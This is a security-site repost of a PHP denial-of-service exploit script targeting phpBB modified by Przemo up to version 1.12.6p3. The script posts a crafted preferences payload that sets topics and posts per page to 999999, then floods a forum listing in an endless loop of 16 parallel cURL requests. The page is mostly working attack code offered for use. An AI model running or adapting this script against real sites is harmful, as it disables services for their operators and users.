首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpBB modified by Przemo <= 1.12.6p3 Denial Of Service Exploit
来源:vfocus.net 作者:GLOBUS 发布时间:2010-04-19  
==============================================================
phpBB modified by Przemo <= 1.12.6p3 Denial Of Service Exploit
==============================================================

<?php
################################################################################
# Exploit Title:         phpBB modified by Przemo <= 1.12.6p3 Denial Of Service Exploit
#
# Software               phpBB modified by Przemo 1.12.6p3
# Date:                  2010-04-18
# Author:                GLOBUS
# Software Link:         http://www.przemo.org/phpBB2/
# Version:               <= 1.12.6p3
# category:              DoS
#
# Greetz:                hds, Neo, pok3, .xXx., j4ck, revel004
################################################################################
// cURL and PHP5



if($argc !== 2)
{
echo "#-------------------------------------------------------------------------\n";
echo "# phpBB modified by Przemo <= 1.12.6p3 Denial Of Service Exploit\n";
echo "# Author: GLOBUS\n";
echo "# Greetz: hds, Neo, pok3, .xXx., j4ck, revel004\n";
echo "#-------------------------------------------------------------------------\n";
echo "# php dos.php [URL]\n#\n";
echo "# php dos.php http://www.evil.pl/viewforum.php?f=1024\n#\n";
echo "# URL - Pelen adres do dzialu gdzie znajduje sie najwiecej tematow >1000\n";
echo "#-------------------------------------------------------------------------\n";
exit;
}

$url = $argv[1];
$purl = substr($url, 0, strrpos($url, '/') + 1);

$cookie = dirname(__FILE__) . '/tmp/cookie.txt';
@mkdir(dirname($cookie), 0777, TRUE);
@file_put_contents($cookie, '');

if(!file_exists($cookie))
{
echo "Can't Create File {$cookie}\n";
exit;
}

$headers = array
(
'User-Agent: Opera/10.66 (Windows NT 5.1; U; ru) Presto/3.8.94 Version/10.66',
'Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1',
'Accept-Language: ru,ru-RU;q=0.9,en;q=0.8',
'Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1'
);

$evilCookie = 'page_avatar=1&overlib=1&onmouse=1&shoutbox=1&user_allow_signature=1&user_showavatars=1&view_ignore_topics=1&topic_start_date=1&ctop=1&custom_rank=1&cagent=1&cignore=1&cquick=1&show_smiles=1&post_icon=1&user_topics_per_page=999999&user_posts_per_page=999999&user_hot_threshold=999999&dateformat=Y-m-d%2C+H%3Ai&user_sub_forum=1&user_split_cat=1&user_last_topic_title=1&user_sub_level_links=2&user_display_viewonline=2&submit=Wy%B6lij';

$c = curl_init();

$opts = array
(
CURLOPT_URL => $purl . 'customize.php',
CURLOPT_HTTPHEADER => $headers,
CURLOPT_POST => 1,
CURLOPT_POSTFIELDS => $evilCookie,
CURLOPT_COOKIEFILE => $cookie,
CURLOPT_COOKIEJAR => $cookie,
CURLOPT_ENCODING => 'gzip, deflate',
CURLOPT_TIMEOUT => 10,
CURLOPT_RETURNTRANSFER => 1,
);
curl_setopt_array($c, $opts);

curl_exec($c);
curl_close($c);


$c = array();

while(TRUE)
{
$mc = curl_multi_init();
for($i = 0; $i < 16; $i++)
{
$c[$i] = curl_init();

$opts = array
(
CURLOPT_URL => $url,
CURLOPT_HTTPHEADER => $headers,
CURLOPT_COOKIEFILE => $cookie,
CURLOPT_COOKIEJAR => $cookie,
CURLOPT_ENCODING => 'gzip, deflate',
CURLOPT_TIMEOUT => 4,
CURLOPT_RETURNTRANSFER => 1,
);
curl_setopt_array($c[$i], $opts);

curl_multi_add_handle($mc, $c[$i]);
}

$count = 0;
do
{
curl_multi_exec($mc, $resource);
usleep(50000);
$count++;
if($count > 60)
{
break;
}
}
while($resource > 0);

curl_multi_close($mc);

for($i = 0; $i < 20; $i++)
{
@curl_close($c[$i]);
}

echo '*';
}

?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS10-006 SMB client-side bug p
·Oracle Financials R12 SQL inje
·IBM BladeCenter Management Mod
·FreeBSD 6.4 root shell exploit
·Magneto Net Resource ActiveX v
·Winamp 5.572 whatsnew.txt SEH
·Magneto Net Resource ActiveX v
·Archive Searcher .zip Stack Ov
·Camiro-CMS_beta-0.1 (fckeditor
·PHP 5.3.x DoS
·linux/x86 - execve("/bin/sh",
·Apache OFBiz SQL Remote Execut
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved